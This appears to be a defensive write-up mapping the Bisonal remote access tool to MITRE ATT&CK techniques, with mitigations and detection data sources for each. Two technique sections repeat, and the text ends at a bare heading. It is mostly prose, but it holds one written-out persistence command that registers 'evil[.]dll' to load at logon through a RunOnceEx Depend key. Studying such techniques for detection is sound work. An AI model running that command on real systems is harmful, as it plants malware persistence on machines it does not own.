Track Common Adversary Tasks Performed Using Bisonal

Presented by: Ashwin (Microsoft Azure MVP)

Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.


MITRE ATT&CK® Matrix for Enterprise

Now, let's see the details around the series of events associated with this software in chronological order, and how we can work to mitigate or detect these threats.


Initial Access

Spearphishing Attachment

Bisonal has been delivered as malicious email attachments.

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.


Anti-virus can also automatically quarantine suspicious files.

Network Intrusion Prevention

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.

Restrict Web-Based Content

Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments.

Software Configuration

Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.

User Training

Users can be trained to identify social engineering techniques and spearphishing emails.

Monitoring the following activities in your Organization can help you detect this technique.

Application Log: Application Log Content

Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)

Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Command and Scripting Interpreter


Windows Command Shell

Bisonal has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.

Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH.

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage cmd to execute various commands and payloads. Common uses include cmd to execute a single command, or abusing cmd interactively with input and output forwarded over a command and control channel.

Execution Prevention

Use application control where appropriate.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may abuse the Windows command shell for execution. Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly executed processes that may abuse the Windows command shell for execution.

Command and Scripting Interpreter


Visual Basic

Bisonal's dropper creates VBS scripts on the victim’s machine.

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications. VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into Spearphishing Attachment payloads (which may also involve Mark-of-the-Web Bypass to enable execution).


Anti-virus can be used to automatically quarantine suspicious files.

Behavior Prevention on Endpoint

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Visual Basic scripts from executing potentially malicious downloaded content.

Disable or Remove Feature or Program

Turn off or restrict access to unneeded VB components.

Execution Prevention

Use application control where appropriate. VBA macros obtained from the Internet, based on the file's Mark of the Web (MOTW) attribute, may be blocked from executing in Office applications (ex: Access, Excel, PowerPoint, Visio, and Word) by default starting in Windows Version 2203.

Restrict Web-Based Content

Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution.

Module: Module Load

Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)

Monitor for the loading of modules associated with VB languages (ex: vbscript.dll).

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

Script: Script Execution

Launching a list of commands through a script file (ex: Windows EID 4104)

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Native API


Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread.

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes. This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via Disable or Modify Tools).

Behavior Prevention on Endpoint

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office VBA macros from calling Win32 APIs. 

Execution Prevention

Identify and block potentially malicious software executed that may be executed through this technique by using application control tools, like Windows Defender Application Control, AppLocker,  or Software Restriction Policies where appropriate.

Monitoring the following activities in your Organization can help you detect this technique.

Module: Module Load

Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)

Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.

User Execution


Malicious File

Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails.

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.

While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Behavior Prevention on Endpoint

On Windows 10, various Attack Surface Reduction (ASR) rules can be enabled to prevent the execution of potentially malicious executable files (such as those that have been downloaded and executed by Office applications/scripting interpreters/email clients or that do not meet specific prevalence, age, or trusted list criteria). Note: cloud-delivered protection must be enabled for certain rules. 

Execution Prevention

Application control may be able to prevent the running of executables masquerading as other files.

User Training

Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.

Monitoring the following activities in your Organization can help you detect this technique.

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Monitor for newly constructed files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly constructed processes and/or command-lines for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.

Office Application Startup



Bisonal has been loaded through a .wll extension added to the %APPDATA%\microsoft\word\startup\ repository.

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs.  There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. 

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

Behavior Prevention on Endpoint

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Monitor for newly constructed files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Monitor for changes made to files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor newly executed processes that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Windows Registry: Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

Audit the Registry entries relevant for enabling add-ins.

Windows Registry: Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

Audit the Registry entries relevant for enabling add-ins.

Create or Modify System Process


Windows Service

Bisonal has been modified to be used as a Windows service.

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via Native API functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as PnPUtil.exe. Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution. To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component).


Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them.

Behavior Prevention on Endpoint

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent an application from writing a signed vulnerable driver to the system. On Windows 10 and 11, enable Microsoft Vulnerable Driver Blocklist to assist in hardening against third party-developed service drivers.

Code Signing

Enforce registration and execution of only legitimately signed service drivers where possible.

Operating System Configuration

Ensure that Driver Signature Enforcement is enabled to restrict unsigned drivers from being installed.

User Account Management

Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. Also collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.

Driver: Driver Load

Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)

Monitor for new service driver installations and loads (ex: Sysmon Event ID 6) that are not part of known software update/patch cycles.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.

Service: Service Creation

Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)

Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045), especially those associated with unknown/abnormal drivers. New, benign services may be created during installation of new software.

Service: Service Modification

Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)

Monitor for changes made to Windows services to repeatedly execute malicious payloads as part of persistence.

Windows Registry: Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

Monitor for new constructed windows registry keys that may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.

Windows Registry: Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.

Boot or Logon Autostart Execution


Registry Run Keys / Startup Folder

Bisonal has added itself to the Registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\ for persistence.

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Run keys may exist under multiple hives. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" 

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders.

Windows Registry: Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

Windows Registry: Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations.

Create or Modify System Process

Privilege Escalation

Windows Service

Bisonal has been modified to be used as a Windows service.

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via Native API functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as PnPUtil.exe. Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution. To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component).


Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them.

Behavior Prevention on Endpoint

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent an application from writing a signed vulnerable driver to the system. On Windows 10 and 11, enable Microsoft Vulnerable Driver Blocklist to assist in hardening against third party-developed service drivers.

Code Signing

Enforce registration and execution of only legitimately signed service drivers where possible.

Operating System Configuration

Ensure that Driver Signature Enforcement is enabled to restrict unsigned drivers from being installed.

User Account Management

Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. Also collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.

Driver: Driver Load

Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)

Monitor for new service driver installations and loads (ex: Sysmon Event ID 6) that are not part of known software update/patch cycles.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.

Service: Service Creation

Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)

Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045), especially those associated with unknown/abnormal drivers. New, benign services may be created during installation of new software.

Service: Service Modification

Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)

Monitor for changes made to Windows services to repeatedly execute malicious payloads as part of persistence.

Windows Registry: Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

Monitor for new constructed windows registry keys that may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.

Windows Registry: Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.

Boot or Logon Autostart Execution

Privilege Escalation

Registry Run Keys / Startup Folder

Bisonal has added itself to the Registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\ for persistence.

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Run keys may exist under multiple hives. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" 

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

File: File Modification

